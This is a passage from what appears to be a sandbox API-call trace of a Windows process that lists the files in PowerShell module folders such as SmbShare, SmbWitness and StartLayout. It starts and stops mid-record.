lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0177.915] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0177.915] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0177.915] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0177.915] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0177.915] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0177.915] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0177.916] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.916] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0177.916] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 0 [0177.916] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.917] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1")) returned 0x20 [0177.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0177.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0177.919] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.920] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.920] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.920] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0177.920] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0177.920] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0177.921] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 0 [0177.921] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.921] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0177.921] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0177.921] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0177.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0177.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0177.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.923] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.923] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0177.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.923] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.923] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0177.923] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0177.924] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.924] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.924] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.924] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0177.925] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0177.925] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0177.925] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 0 [0177.925] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.926] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness\\smbwitness.psd1")) returned 0x20 [0177.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.927] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0177.927] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0177.927] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.928] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.928] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0177.928] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, 